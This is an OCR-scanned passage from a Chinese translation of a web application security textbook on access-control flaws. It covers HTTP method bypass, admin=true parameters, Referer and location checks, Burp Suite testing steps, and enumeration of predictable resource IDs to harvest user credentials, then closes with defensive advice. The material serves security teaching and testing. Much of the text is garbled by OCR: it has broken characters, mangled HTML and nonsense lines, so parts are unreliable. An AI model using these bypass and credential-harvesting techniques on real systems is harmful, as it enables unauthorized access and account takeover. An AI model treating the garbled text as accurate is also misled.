是 否 使 用 POST 方法 ， 则 攻击 者 就 可 以 通过 使 用 GET 方 法 提交 同一 请 求 
来 避 开 这 种 控制 。 由 于 大 多 数 用 于 检索 请 求 参 数 的 应 用 程序 级 API 对 于 
请 求 方法 并 无 限制 ， 因 此 ， 攻 击 者 只 需要 在 GET 请 求 的 URL 碍 询 字 符 串 
中 提供 所 需 参数 ， 就 可 以 未 授权 使 用 上 述 功 能 。 

令 人 更 加 惊奇 的 是 ， 即 使 平台 级 规则 拒绝 访问 GET 和 POST 方法 ， 
应 用 程序 仍 有 可 能 易于 受到 攻击 。 这 是 因为 ， 使 用 其 他 HTTP 方 法 的 请 
求 可 能 最 终 由 处 理 GET 和 POST 请 求 的 相同 应 用 程序 代码 来 处 理 。HEAD 
方法 就 是 一 个 典型 的 例子 。 根 据 规范 ， 服 务 器 应 使 用 它们 用 于 啊 应 对 应 
的 GET 请 求 的 相同 消息 头 〈《 但 不 包含 消息 主体 ) 来 响应 HEAD 请 求 。 因 
此 ， 大 多 数 平台 都 能 够 正确 处 理 HEAD 请 求 ， 即 执行 对 应 的 GET 处 理 程 
序 并 返回 生成 的 HTTP 消息 头 。 通 常 ，GET 请 求 可 用 于 执行 敏感 操作 ， 
这 或 者 是 因为 应 用 程序 本 身 将 GET 请 求 用 于 这 一 目的 《与 规范 不 符 ) ， 
或 者 是 因为 它 并 不 验证 是 否 使 用 了 POST 方法 。 如 果 攻 击 者 能 够 使 用 
HEAD 请 求 增 加 一 个 管理 用 户 账 户 ， 那 么 ， 即 使 在 请 求 中 未 收 到 任何 消 
息 主体 ， 他 仍然 能 够 成 功 实施 攻击 。 

某 些 情况 下 ， 对 于 使 用 无 法 识别 的 HTTP 方 法 的 请 求 ， 平 台 会 直接 
将 它们 交 由 GET 请 求 处 理 程序 处 理 。 在 这 种 情况 下 ， 通 过 在 请 求 中 指定 
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一 些 应 用 程序 使 用 一 种 极其 不 安全 的 访问 控制 模型 ， 基 于 客户 端 提 
交 的 请 求 参数 或 受 攻击 者 控制 的 其 他 条 件 做 出 访问 控制 决定 。 
1. 基于 参数 的 访问 控制 

在 一 些 这 种 模型 中 ， 应 用 程序 在 用 户 登录 时 决定 用 户 的 角色 或 访问 
级 别 ， 并 在 登录 后 通过 隐藏 表单 字段 、cookie 或 者 预先 设 定 的 查询 字符 
串 参 数 〈 参 阅 第 5 章 了 解 相 关内 容 ) 由 客户 端 传送 这 些 信息 。 应 用 程序 
0 并 为 用 户 分 配 相应 的 访问 
级 列 。 


例如 ， 使 用 应 用 程序 的 管理 员 将 看 到 以 下 URL: 
https://wahh-app.com/login/home.jsp?admin=true 


但 普通 用 户 看 到 的 URL 中 包含 一 个 不 同 的 参数 ， 或 者 根本 不 包含 任何 参 
数 。 任 何 知道 分 配给 管理 员 的 参数 的 用 户 只 需 在 他 自己 的 请 求 中 使 用 这 
个 参数 ， 束 可 以 访问 管理 功能 。 

有 时 候 ， 如 果 不 以 高 级 权限 用 户 的 号 份 实际 使 用 应 用 程序 ， 并 确定 
在 使 用 过 程 中 提出 了 哪些 请 求 ， 这 种 类 型 的 访问 控制 可 能 很 难 探测 出 
来 。 作 为 普通 用 户 ， 我 们 可 以 使 用 在 第 4 章 讨 论 的 如 何 发 现 隐 藏 请 求 参 
数 的 技巧 成 功 查 明 这 种 机 制 。 

2. 基于 Referer 的 访问 控制 

在 其 他 不 安全 的 访问 控制 模型 中 ， 应 用 程序 使 用 HTTP Referer E 
头 做 出 访问 控制 决定 。 例 如 ， 应 用 程序 可 能 会 根据 用 户 的 权限 ， 严 格 控 
制 用 户 访 问 主 维护 菜单 。 但 是 ， 如 果菜 名 用 户 提 出 请 求 ， 要 求 访问 某 项 
管理 功能 ， 应 用 程序 可 能 只 是 检查 该 请 求 是 否 由 管理 菜单 页 面 提出 ， 如 
果 确 实 由 该 页 面 提出 ， 即 认为 该 用 户 一 定 已 经 访问 过 那个 页 面 ， 并 因此 
己 经 拥有 了 必要 的 权限 。 当 然 ， 从 本 质 上 讲 ， 这 种 模型 并 不 安全 ， 因 为 
Referer 消 息 头 完全 由 用 户 控 制 ， 并 可 设 定 为 任何 值 。 

3. 基于 位 置 的 访问 控制 

许多 公司 都 具有 管理 或 业务 要 求 ， 根 据 用 户 的 地 理 位 置 限制 对 资源 
的 访问 。 这 些 公司 不 仅 包 括 金融 机 构 ， 还 包括 新 闻 服 务 及 其 他 部 门 。 在 
这 些 情 况 下 ， 公 司 会 采用 各 种 方法 来 确定 用 户 的 位 置 ， 其 中 最 常用 的 是 
用 户 当 前 IP 地 址 的 地 理 位 置 。 
攻击 者 能 够 轻易 突破 基于 位 置 的 访问 控制 。 以 下 是 一 些 常用 的 方 
法 : 

口 使 用 位 于 所 需 位 置 的 Web 代 理 服务 器 ; 

口 使 用 在 所 需 位 置 终止 的 VPN; 
































口 使 用 支持 数据 漫游 的 移动 设备 ; 
口 直接 修改 客户 端 用 于 确定 地 理 位 置 的 机 制 。 








8.2 Meats ii ial Hsia 
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试 员 应 该 花 一 些 时 间 检 查 解 析 应 用 程序 过 程 中 得 到 的 结果 《请 参阅 第 4 
章 了 解 相关 内 容 ) ， 了 解 应 用 程序 在 访问 控制 方面 的 实际 要 求 ， 从 而 决 
定 探查 哪些 内 容 可 以 得 到 最 令 人 满意 的 结果 。 





渗透 测试 步 又 


在 分 析 应 用 程序 的 访问 控制 机 制 时 ， 需 要 考虑 以 下 问题 。 
n C1) 应 用 程序 的 功能 是 否 允 许 用 户 访问 属于 他 们 的 特定 数 

(2) 是 否 存 在 各 种 级 别 的 用 户 ， 如 经 理 、 主 管 、 贵 宾 等 ， 是 
否 允 许 他 们 访问 不 同 的 功能 ? 

(3) 管理 员 是 否 使 用 内 置 在 相同 应 用 程序 中 、 以 对 其 进行 配 
置 和 监控 的 功能 ? 

(4) 发 现 应 用 程序 的 哪些 功能 或 数据 资源 最 有 可 能 帮助 攻击 
者 提升 当前 的 权限 ? 

(5) 是 否 存在 任何 标识 符 ( 以 POST 消 息 体 的 URL 参 数 的 方 
式 ) 表明 正 使 用 某 一 参数 追踪 访问 控制 级 别 ? 




















测试 应 用 程序 的 访问 控制 效率 的 最 简单 、 最 有 效 的 方法 ， 是 使 用 其 
他 账户 访问 应 用 程序 。 这 样 你 束 可 以 确定 ， 可 由 一 个 账户 合法 访问 的 资 
源 和 功能 是 否 能 够 由 力 一 个 账户 非法 访问 。 





渗透 测试 步 又 


(1) 如 果 应 用 程序 隔离 用 户 对 不 同 级别 的 功能 的 访问 ， 可 以 
首先 使 用 一 个 权限 较 高 的 账户 确定 所 有 可 用 的 功能 ， 然 后 使 用 权限 
较 低 的 账户 访问 这 些 功能 ， 测 试 能 人 否 垂直 提升 权限 。 

(2) 如 果 应 用 程序 隔离 用 户 对 不 同 资源 〈 如 文档 ) 的 访问 ， 
可 以 使 用 两 个 不 同 的 用 户 级 账户 测试 访问 控制 是 否 有 效 ， 或 者 是 否 
可 以 水 平 提升 权限 。 例 如 ， 找 到 一 个 一 名 用 户 可 以 合法 访问 ， 但 另 
一 名 用 户 不 能 合法 访问 的 文档 ， 然 后 尝试 使 用 第 三 名 用 户 的 账户 访 
问 该 文档 通过 请 求 相 关 URL 或 在 第 二 名 用 户 的 会 话 中 提交 同样 
的 POST 参数 。 

对 应 用 程序 的 访问 控制 进行 彻底 测试 需要 耗费 大 量 时 间 。 笠 运 的 


是 ， 一 些 工 具 可 以 帮助 你 目 动 完成 订 坚 工作 ， 以 提高 测试 速度 和 可 靠 
E E 
ls 


借助 Burp Suite， 可 以 使 用 两 个 不 同 的 用 户 账户 来 解析 应 用 程序 的 
内 容 。 然 后 ， 可 以 比较 每 一 名 用 户 访问 的 内 容 到 底 存在 哪些 差异 。 






































渗透 测试 步 又 


(1) 将 Burp 配 置 为 代理 服务 器 并 禁用 拦截 ， 以 一 个 用 户 账 户 
浏览 应 用 程序 的 所 有 内 容 。 如 果 要 测试 垂直 访问 控制 ， 则 使 用 权限 
较 高 的 账户 。 

(2) 检查 Burp 的 站 点 地 图 的 内 容 ， 确 保 已 确定 要 测试 的 所 有 
功能 。 然 后 使 用 上 下 文 菜 单 选择 “ 比 较 站 点 地 图 ”(compare site 
maps) 功能 。 

(3) 要 选择 第 二 个 进行 比较 的 站 点 地 图 ， 可 以 从 Burp 状 态 文 
件 中 加 载 该 地 图 ， 或 让 Burp 在 新 会 话 中 动态 重新 请 求 第 一 个 站 点 地 
图 。 要 测试 同一 类 型 的 用 户 之 间 的 水 平 访问 控制 ， 只 需 加 载 以 前 保 
存 的、 已 将 应 用 程序 映射 为 其 他 用 户 的 状态 文件 。 要 测试 垂直 访问 
控制 ， 最 好 是 以 低 权 限 用 户 和 喘 份 重新 请 求 蜗 权限 站 点 地 图 ， 因 为 这 
样 可 确保 完全 涵盖 相关 的 功能 。 

(4) 要 在 不 同 的 会 话 中 重新 请 求 第 一 个 站 点 地 图 ， 需 要 使 用 
低 权 限 用 户 会 话 的 详细 资料 配置 Burp 的 会 话 处 理 功 能 (例如 ， 通 过 
记录 一 个 登录 宏 或 提供 要 在 请 求 中 使 用 的 特定 cookie〉。 我 们 将 在 
第 14 章 中 详细 讨论 此 功能 。 还 可 能 需要 定义 适当 的 范围 规则 ， 以 防 
止 Burp 请 求 任 何 注销 功能 。 


图 8-1 显 示 了 一 次 简单 站 点 地 图 比较 的 结果 。 其 中 的 深 色 部 分 是 站 
扩 地 图 之 间 差 异 分 析 的 结果 ， 这 些 部 分 显示 了 两 个 地 图 之 间 已 添加 、 删 
除 或 修改 的 项 目 。 对 于 已 修改 的 项 目 ， 该 表格 提供 了 一 个 “diff 
count” 列 ， 其 中 列 出 了 将 第 一 个 地 图 中 的 项 目 修改 为 第 二 个 地 图 中 的 项 
目 所 需 的 编辑 次 数 。 而 且 ， 如 果 选 中 一 个 项 目 ， 其 啊 应 也 以 深 色 显 示 ， 
以 显示 那些 编辑 在 啊 应 中 的 位 置 。 
































图 8-1 显示 以 不 同 用 户 账户 访问 的 内 容 之 间 的 差异 的 站 点 地 图 比较 


解释 站 点 地 图 比较 的 结果 需要 一 定 的 智 疗 ， 并 需要 了 解 特定 应 用 程 
序 功能 的 意义 及 用 法 。 例 如 ， 图 8-1 显 示 了 在 用 户 查 看 主页 时 返回 给 每 
名 用 户 的 啊 应 。 其 中 的 两 个 啊 应 显示 了 针对 登录 用 户 的 不 同 说 明 ， 而 且 
管理 用 户 拥 有 一 个 额外 的 全 单项 。 这 些 差 异 是 预期 行为 ， 它 们 与 应 用 程 
序 访问 控制 的 效率 无 关 ， 因 为 它们 只 与 用 户 界 面 有 关 。 

用 户 请 求 顶级 管理 页 面 时 返回 的 啊 应 如 图 8-2 所 示 。 其 中 显示 ， 管 
理 用 户 可 以 看 到 一 个 包含 可 用 选项 的 菜单 ， 而 普通 用 户 则 看 到 “未 授 
权 ”(not authorized) 消息 。 这 些 差 异 表 明 ， 访 问 控 制 已 得 到 正确 应 用 。 
用 户 请 求 “ 列 举 用 户 ”(〈list users) 管理 功能 时 返回 的 啊 应 如 图 8-3 所 示 。 
其 中 显示 的 两 个 啊 应 完全 相同 ， 这 表示 应 用 程序 易于 受到 攻击 ， 因 为 普 
通用 户 不 应 拥有 访问 此 功能 的 权限 ， 而 且 该 用 户 的 用 户 界面 中 也 没有 任 
何 指 同 该 功能 的 链接 。 























t><br><a 
rete "Howe. ashx">Home</ a> 
ir> </body>? </html> 
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狗 8-3” 低 权限 用 户 可 以 访问 用 于 列举 应 用 程序 用 户 的 管理 功能 


仅仅 通过 分 析 站 点 地 图 树 及 碍 看 项 目 之 间 的 差异 数量 ， 并 不 足以 评 
佑 应 用 程序 访问 控制 的 效率 。 出 现 两 个 完全 相同 的 啊 应 可 能 表示 存在 漏 
洞 “例如 ， 在 披露 敏感 信息 的 管理 功能 中 ) ， 也 可 能 不 会 导致 任何 危险 
(例如 ， 在 不 受 保护 的 搜索 功能 中 ) 。 相 反 ， 两 个 不 同 的 响应 也 有 可 能 
表示 存在 漏洞 “例如 ， 在 每 次 访问 都 返回 不 同 内 容 的 管理 功能 中 ) ， 也 
可 能 不 会 导致 任何 危险 (例如 ， 在 显示 当前 登录 用 户 的 用 户 信息 的 页 面 
H) 。 基 于 上 述 原 因 ， 在 确定 访问 控制 漏洞 方面 ， 完 全 自动 化 的 工具 往 
往 效 率 低下 。 使 用 Burp 的 “站 点 地 图 比较 ”功能 ， 可 以 尽 可 能 自动 完成 确 
定 漏洞 的 过 程 ， 以 现成 的 格式 获得 所 需 的 全 部 信息 ， 同 时 应 用 上 自己 在 应 
用 程序 功能 方面 的 知识 来 确定 任何 具体 的 漏洞 。 

















Al yn) 

笑 试 访问 
http://mdsec.net/auth/462/ 
http://mdsec.net/auth/468/ 


8.2.2 ”测试 多 阶段 过 程 


上 一 节 介 绍 的 方法 一 一 比较 通过 不 同 用 户 账户 访问 的 应 用 程序 内 容 
一 一 无 法 用 于 测试 某 些 多 阶段 过 程 。 在 多 阶段 过 程 中 ， 要 执行 某 个 操 
作 ， 用 户 通 常 需要 以 正确 的 顺序 提出 多 个 请 求 ， 应 用 程序 则 在 用 户 提出 
请 求 的 同时 创建 有 关 用 户 操作 的 状态 。 仅 仅 重 新 请 求 站 点 地 图 中 的 每 一 
个 项 目 ， 并 不 能 正确 重复 相关 过 程 ， 因 此 ， 由 于 访问 控制 以 外 的 其 他 原 
因 ， 你 尝试 的 操作 可 能 会 失败 。 

以 添加 新 应 用 程序 用 忆 的 管理 功能 为 例 。 该 功能 可 能 涉及 几 个 步 
又 ， 包 括 加 载 用 于 添加 用 户 的 表单 、 提 交 包 含 新 用 户 详细 资料 的 表单 、 
审查 用 户 详细 资料 ， 以 及 确认 诬 加 操作 。 茶 些 情况 下 ， 应 用 程序 可 能 大 
会 初始 表单 提供 保护 ， 但 没有 为 处 理 表 单 提交 的 页 面 或 确认 页 面 提供 保 
护 。 整 个 过 程 可 能 包含 大 量 请 求 CARER) ， 在 以 前 阶段 提交 的 参 
数 将 在 以 后 通过 客户 端 重 新 传送 。 因 此 ， 这 个 过 程 的 每 一 个 步骤 都 需要 
单独 进行 测试 ， 以 确认 访问 控制 是 否 得 到 正确 应 用 。 
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http://mdsec.net/auth/471/ 


渗透 测试 步 又 


(1) 在 以 多 步骤 方式 执行 某 个 操作 ， 需 要 从 客户 端 癌 服务 髓 
提交 几 个 不 同 的 请 求 时 ， 应 单独 测试 每 一 个 请 求 ， 以 确定 是 耕 已 对 
这 些 请 求 应 用 了 访问 控制 。 应 确保 测试 每 一 个 请 求 ， 包 括 表单 提 
交 、 重 定向 ， 以 及 任何 非 参 数 化 的 请 求 。 

(2) 党 试 发 现 应 用 程序 确定 你 是 否 到 达 特 定 阶 段 〈 必 须 通 过 
合法 的 途径 到 达 该 阶段 〉 的 任何 位 置 。 尝 试 使 用 权限 较 低 的 账户 到 
达 该 阶段， 检测 是 否 可 以 实施 任何 权限 提升 攻击 。 

(3) 手动 执行 这 种 测试 的 一 种 方法 ， 是 在 浏览 器 中 多 次 完成 
受 保护 的 多 阶段 过 程 ， 并 使 用 代理 服务 器 将 在 不 同 请 求 中 提供 的 会 
话 令 有 牌 切 换 为 权限 较 低 的 用 户 的 令 牌 。 

(4) 通过 使 用 Burp Suite 的 “浏览 右 中 的 请 求 ”(request in 
browser) 功能 ， 可 以 显著 加 快 这 个 过 程 。 

Ca) 使 用 权限 较 高 的 账户 过 历 整 个 多 阶段 过 程 。 

i 0 

EJF o 
(c) 在 Burp Proxy 的 历史 记录 中 ， 找 到 权限 较 高 的 用 户 执 

行 多 步骤 过 程 时 提出 的 请 求 序列 。 对 于 序列 中 的 每 个 请 求 ， 选 

择 “ 当 前 浏览 器 会 话 在 浏览 器 中 的 请 求 ”(request in browser in 

current browser session) 上 下 文 染 单项 〈 如 图 8-4 所 示 ) 。 将 提 

供 的 URL 粘 贴 到 以 权限 较 低 的 用 户 喘 份 登录 的 浏览 器 中 。 
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Cd) 如 果 应 用 程序 允许 ， 则 使 用 浏览 器 以 正常 方式 完成 
剩 下 的 多 阶段 过 程 。 

Ce) 查看 浏览 器 和 代理 服务 器 历史 记录 中 的 结果 ， 确 定 
是 否 可 以 成 功 执行 特权 操作 。 


当 你 对 指定 的 请 求 选 择 Burp 的 “当前 浏览 器 会 话 在 浏览 器 中 的 请 
求 ”功能 时 ，Burp 会 同 你 提供 一 个 指定 Burp 的 ea 唯一 
URL， 然 后 ， 将 这 个 URL 粘 贴 到 浏览 器 的 地 址 栏 中 。 当 你 在 浏览 器 中 请 
求 这 个 URL 时 ，Burp 将 返回 一 个 指 辣 最 初 指 定 的 URL 的 重 定 癌 。 浏 览 占 
访问 该 重 定向 时 ，Burp 将 用 最 初 指 定 的 请 求 蔡 换 该 请 求 ， 同 时 保持 
Cookie 消 息 头 不 变 。 如 果 正 测试 不 同 的 用 户 账户 ， 可 以 加 快 这 个 过 程 。 
以 不 同 用 户 登 录 几 个 不 同 的 浏览 器 ， 并 将 上 述 URL 粘 贴 到 每 个 浏览 器 
中 ， 看 应 用 程序 如 何 处 理 使 用 不 同 浏览 器 登录 的 用 户 的 请 求 。 (需要 注 
意 的 是 ， 由 于 同一 浏览 器 通常 会 在 不 同窗 口 之 间 共 享 cookie， 因 此 ， 在 
Saree 需要 使 用 不 同 的 浏览 器 产品 ， 或 安装 在 不 同 机 器 上 的 
浏览 器 。) 











¥ ”提示 ”以 不 同 的 用 户 账户 测试 多 阶段 过 程 时 ， 检 查 不 同 用 





户 逐 个 提出 的 请 求 的 序列 有 助 于 确定 有 利于 进一步 调查 的 细微 差 
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如 有 果 使 用 不 同 浏览 器 以 不 同 用 户 喘 份 访问 应 用 程序 ， 可 以 在 
Burp 中 创建 供 每 个 浏览 器 使 用 的 不 同 代理 监听 器 《需要 在 每 个 浏览 
器 中 更 新 代理 服务 器 配置 ， 以 指 同 相 关 监 听 器 ) 。 然 后 ， 对 于 每 个 
浏览 器 ， 使 用 代理 服务 器 历史 记录 中 的 上 下 文 沫 单打 开 新 的 历史 记 
0 











如 果 只 有 一 个 用 户 级 账户 可 用 于 访问 应 用 程序 (或 根本 没有 任何 账 
户 ) ， 这 时 ， 要 测试 访问 控制 的 效率 ， 还 需要 完成 其 他 工作 。 实 际 上 ， 
无 论 在 什么 情况 下 ， 要 想 执行 全 面 彻底 的 测试 ， 都 需要 完成 其 他 工作 。 
在 应 用 程序 中 ， 可 能 存在 一 些 未 受到 严格 保护 的 功能 ， 而 且 任 何 用 户 界 
面 均 未 明确 提供 这 些 功能 的 链接 。 例 如 ， 可 能 有 一 些 旧 功能 尚未 删除 ， 
或 者 新 功能 已 部 署 但 未 癌 用 户 公布 。 








渗透 测试 步 又 


(1) 使 用 第 4 章 介 绍 的 内 容 查 找 技巧 确定 尽 可 能 多 的 应 用 程序 
Ae 通常 ， 以 权限 较 低 的 用 户 进 行 查找 束 足 以 枚 举 并 直接 访问 敏 
感 功能 。 

(2) 如 果 确 定 可 能 向 普通 和 管理 用 户 提供 不 同 功能 或 链接 的 
应 用 程序 页 面 〈 例 如 , “控制 面板 ”或 “我 的 主页 ”) ， 演 试 在 UREL 碍 
询 字 符 串 和 POST 请 求 主体 中 插入 admin=true 之 类 的 参数 ， 确 定 这 样 
做 是 否 可 发 现 或 访问 任何 其 他 你 所 拥有 的 用 户 权 限 正 常 无 法 访问 的 


功能 。 

(3) 测试 应 用 程序 是 否 基 于 Referer 消 息 头 做 出 访问 控制 决 
策 。 对 于 获得 授权 访问 的 关键 应 用 程序 功能 ， 壬 试 删除 或 修改 
Referer 消 息 头 并 确定 是 否 仍然 能 够 成 功 提出 请 求 。 如 果 不 能 ， 应 用 
程序 可 能 以 某 种 不 安全 的 方式 信任 Referer 消 息 头 。 如 果 使 用 Burp 的 
主动 扫描 喜 扫 描 请 求 ，Burp 会 答 试 删除 每 个 请 求 的 Referer 消 上 头 ， 
并 通知 你 这 样 做 是 否 会 在 应 用 程序 的 啊 应 中 造成 对 应 的 相关 差异 。 

(4) 检查 所 有 客户 端 HTML 与 脚本 ， 和 查找 隐藏 功能 或 可 从 客 
户 端 进行 操纵 的 功能 的 引用 ， 如 基于 脚本 的 用 户 界面 。 同 时 ， 反 编 
ee PAD ase ZAR, AREIS irim BE AY 
引用 。 
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笑 试 访问 
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一 旦 枚 举 出 所 有 可 访问 的 功能 ， 束 有 必要 测试 应 用 程序 是 人 否 正 确 划 
分 每 名 用 户 访 问 资源 的 权限 。 如 宁 应 用 程序 允许 用 户 访问 一 组 内 容 广 泛 
的 相同 类 型 的 资源 《〈 如 文档 、 订 单 、 电 子 邮件 和 个 人 资料 ) ， 则 用 户 就 
有 机 会 未 授权 访问 其 他 资源 。 





渗透 测试 步 又 


(1) 无 论 应 用 程序 使 用 何 种 标识 符 〈 文 档 ID、 账 号 、 订 单 引 
i ee ee 
MIRIT. 

(2) 如 果 有 可 能 生成 一 系列 紧密 相连 的 标识 符 《〈 例 如 ， 通 过 
创建 儿 个 新 文档 或 订单 ) ， 则 可 以 使 用 我 们 在 第 7 章 描 述 的 针对 会 
人 
PII o 

(3) 如 果 无 法 生成 任何 新 标识 符 ， 那 么 只 能 通过 分 析 已 经 发 
现 的 标识 符 ， 或 纯粹 使 用 猜测 方法 查找 标识 符 。 如 果 标 识 符 为 
GUID 形 式 ， 则 基于 猜测 的 尝试 将 无 法 取得 成 功 。 但 是 ， 如 末 标 识 
从 是 一 个 相对 较 小 的 数字 ， 则 可 以 尝试 使 用 与 它 相 差 不 大 的 男 一 个 
数字 ， 或 数字 位 相同 的 男 一 个 随机 数字 。 

(4) 如 果 发 现 访问 控制 并 不 完善 ， 而 且 资 源 标 识 符 可 以 预 
测 ， 可 以 发动 目 动 攻击 获取 应 用 程序 的 敏感 资源 和 信息 。 可 以 使 用 
在 第 14 章 描述 的 技巧 ， 设 计 一 次 定制 自动 攻击 ， 以 获取 所 需 的 数 


据 。 

如 果 “ 账 户 信 息 ” 页 面 在 显示 用 户 个 人 资料 的 同时 还 显示 他 的 用 
户 名 和 密码 ， 则 这 种 漏洞 可 能 会 造成 灾难 性 的 后 果 。 虽 然 输 入 的 密 
ASE Bee Eee AN, (AE VaR DARK SCH SEIS AR I AS TALI, 
HE SY DPR a JV as FE A EL], Ta TA H 
户 ， 包 括 管理 员 的 登录 证 书 。 图 8-5 说 明了 如 何 使 用 Burp Intruder 成 
功 执行 这 种 攻击 。 





























Falign="right'></ta>< tr></table><table border="1" = 000000" 
bordercolor="S00D0000" cellspacing="0" cellpadding="O"vidth=" 100%" 
style="border-collapse: collapse"><tr><td></td></te></table><br/> 


<table bhorder="0"><tr><ctd>Mame: 

</td> <td>Administrator</td></trc><tc><td>Vaername: 
</td><td>admin</td></tr><tr><td>Password: </tc><td>pwnedk/td></tr><tr><ta>uid: 
</td><td>79</td></tr><tr><td>Role: 
</td><tcd>Administrator</td></tr></table><br><a 

hrel*"Home, ashx">Home</ a> <br></hody></btml> 





Al, yn vw.) 

笑 试 访问 
http://mdsec.net/auth/488/ 
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YY 提示 ”如果 检测 到 访问 控制 漏洞 ， 可 以 立即 发 动 一 次 攻 

击 ， 每 试 通 过 攻破 一 个 具有 省 理 权 限 的 用 户 账户 来 进一步 提升 自己 
的 权限 。 可 以 通过 各 种 技巧 查找 管理 账户 。 利 用 上 面 介 绍 的 访问 控 
制 缺 陷 ， 可 以 获得 数 百 个 用 户 证 书 ， 并 尝试 手 动 登录 每 一 个 账户 ， 
直到 找到 管理 员 账 户 。 但 是 ， 如 果 账 户 以 连续 的 数字 有 D 为 标识 符 ， 
则 应 用 程序 通 冲 会 将 最 小 的 数字 账户 分 配给 管理 员 。 登 录 几 个 最 先 
注册 的 用 尸 ， 往 往 就 可 以 确定 应 用 程序 管理 员 账 户 。 如 果 这 种 方法 
不 可 行 ， 一 种 有 效 的 方法 是 在 应 用 程序 中 碍 找 其 访问 权限 被 水 平 隔 
离 的 功能 一 一 例如 ， 同 每 名 用 户 呈 现 的 主页 。 编 写 一 段 脚本 ， 使 用 
截获 的 每 个 证 书 登 录 ， 然 后 尝试 访问 自己 的 主页 。 很 可 能 管理 用 户 



































能 够 查看 每 一 名 用 户 的 主页 ， 因 此 ， 如 果 用 于 登录 的 是 管理 账户 ， 
你 立即 就 会 发 觉 。 





如 果 应 用 程序 使 用 直接 访问 服务 器 端 API 方法 的 请 求 ， 正 常情 况 
下 ， 使 用 上 述 技巧 即 可 以 确定 这 些 方法 中 的 任何 访问 控制 漏洞 。 但 是 ， 
还 应 该 进行 测试 ， 以 确定 是 否 存在 其 他 可 能 未 受到 正确 保护 的 API. 

以 使 用 下 列 请 求 调用 的 servlet 为 例 : 





POST /swc HTTP/1.1 
Accept-Encoding: gzip, deflate 
Kost: wahh-app 

Content-Length: 37 


servlet=com.ibm.ws.webcontainer.httpsession. IBMTrackerDebug 


由 于 这 是 一 个 众所周知 的 servlet， 攻 击 者 可 能 能 够 访问 其 他 servlet 以 执 
行 未 授权 操作 。 


渗透 测试 步 又 


(1) 确定 任何 遵循 Java 命 名 约定 (例如 get、set、add、 
update、is 或 has 后 接 大 写 单词 ) 或 明确 指定 包 结 构 〈 如 
com.companyname.xxx.yyy.ClassName) 的 参数 。 记 下 所 有 你 能 够 发 
现 的 被 引用 的 方法 。 

(2) 找到 某 个 列举 可 用 接口 或 方法 的 方法 。 在 代理 服务 器 历 
史记 录 中 进行 搜索 ， 看 应 用 程序 的 正常 通信 和 是否 调 用 了 该 方法 。 如 
条 该 方法 未 被 调用 ， 则 答 试 使 用 观察 到 的 命名 约定 猜测 该 方法 。 

(3) 在 公共 资源 《如 搜索 引 敬 和 论坛 站 点 ) 中 碍 找 ， 以 确定 
任何 其 他 可 以 访问 的 方法 。 

(4) 使 用 第 4 章 介绍 的 技巧 猜测 其 他 方法 名 称 。 














(5) 尝试 使 用 各 种 用 户 账户 (包括 未 授权 访问 ) 访问 收集 到 
的 所 有 方法 。 

(6) 如果 不 知道 某 些 方法 需要 的 参数 的 数量 或 类 型 ， 可 以 寻 
找 那些 不 大 可 能 使 用 参数 的 方法 ， 如 listInterfaces 和 
getAllUsersInRoles. 








如 果 受 应 用 程序 保护 的 静态 资源 最 终 可 以 通过 指向 资源 文件 本 身 的 
URL 直 接 访 问 ， 这 时 你 应 该 进行 测试 ， 以 确定 未 授权 用 户 是 否 可 以 直接 
请 求 这 些 URL。 





渗透 测试 步 又 


(1) 表 历 访问 受 保护 静态 资源 的 正常 过 程 ， 获 取 用 于 最 终 访 
问 该 资源 的 UREL 示 例 。 

(2) 使 用 不 同 的 用 户 账户 《如 权限 较 低 的 用 户 或 没有 购买 所 
需 商 品 的 账户 ，， 尝 试 使 用 已 确定 的 URL 直 接 访 问 该 资源 。 

(3) 如 果 这 种 攻击 取得 成 功 ， 尝 试 了 解 受 保护 的 静态 资源 所 
使 用 的 命名 方案 。 如 果 可 能 ， 设 计 一 个 自动 攻击 ， 获 取 可 能 有 用 或 
可 能 包含 敏感 数据 的 内 容 〈 请 参阅 第 14 章 ) 。 











虽然 并 没有 现成 的 方法 可 用 于 检测 应 用 程序 的 访问 控制 是 个 对 
HTTP 方 法 实施 了 平台 级 控制 ， 但 是 ， 可 以 通过 一 些 简单 的 步骤 来 确定 
任何 漏洞。 


渗透 测试 步 又 


(1) 使 用 一 个 权限 较 高 的 账户 ， 确 定 一 些 执行 敏感 操作 的 特 
权 请 求 ， 如 添加 新 用 户 或 更 改 用 户 的 安全 角色 的 请 求 。 

C2) 如果 这 些 请 求 未 受到 任何 反 CSRE 令 牌 或 类 似 功 能 《〈 请 参 
bal A135) 的 保护 ， 可 以 使 用 权限 较 高 的 账户 确定 ， 如 果 HTTP 方 
法 被 修改 ， 应 用 程序 是 否 仍然 执行 请 求 的 操作 。 应 测试 的 HTTP 方 
法 包括 : 

DQ POST; 

J GET; 

J HEAD; 

口 任何 无 效 的 HTTP 方 法 。 

(3) 如 果 应 用 程序 执行 任何 使 用 与 最 初 的 方法 不 同 的 HTTP 方 
法 的 请 求 ， 则 应 使 用 上 述 标 准 技 巧 ， 通 过 权限 较 低 的 账户 对 针对 这 
些 请 求实 施 的 访问 控制 进行 测试 。 




















访问 控制 是 最 容易 理解 的 Web 应 用 程序 安全 领域 ， 但 是 在 执行 它们 
时 必须 采用 合理 、 全 面 的 方法 。 

首先 应 避免 几 种 明显 的 缺陷 。 出 现 这 些 缺 陷 ， 通 党 是 由 于 我 们 不 了 
解 执行 有 效 访问 控制 应 满足 的 基本 要 求 ， 或 者 对 用 户 应 提出 哪些 请 求 ， 
以 及 应 用 程序 需要 防御 哪些 威胁 存在 错误 的 认识 。 

口 不 要 认为 用 户 不 知道 用 于 指定 应 用 程序 资源 的 URE 或 标识 符 〈 如 
账号 和 文档 ID ) 束 无 法 访问 这 些 资 源 。 假 设 用 户 知道 每 一 个 应 用 程序 的 
URL 和 标识 符 ， 确 保 应 用 程序 的 访问 控制 足以 防止 未 授权 访问 。 

口 不 要 信任 任何 用 户 提 区 的 表示 访问 权限 的 参数 〈 如 
admin=true) 。 

口 不 要 认为 用 户 将 按 设 定 的 顺序 访问 应 用 程序 页 面 。 不 要 认为 因为 
用 户 无 法 访问 “编辑 用 户 ” 页 面 ， 他 们 就 不 能 到 达 由 该 页 面 链接 的 “编辑 
HEX’ HHE. 

口 不 要 相信 用 户 不 会 算 改 通过 客户 端 传送 的 数据 。 如 果 用 户 提 交 的 
ee 
以 下 是 一 些 在 Web 应 用 程序 中 执行 有 效 访问 控制 的 最 佳 方法 。 

口 仔 细 评 估 并 记录 每 个 应 用 程序 功能 单元 的 访问 控制 要 求 。 这 包括 
谁 能 合法 使 用 这 些 功能 ， 以 及 用 户 通过 这 些 功能 能 够 访问 哪些 资源 。 
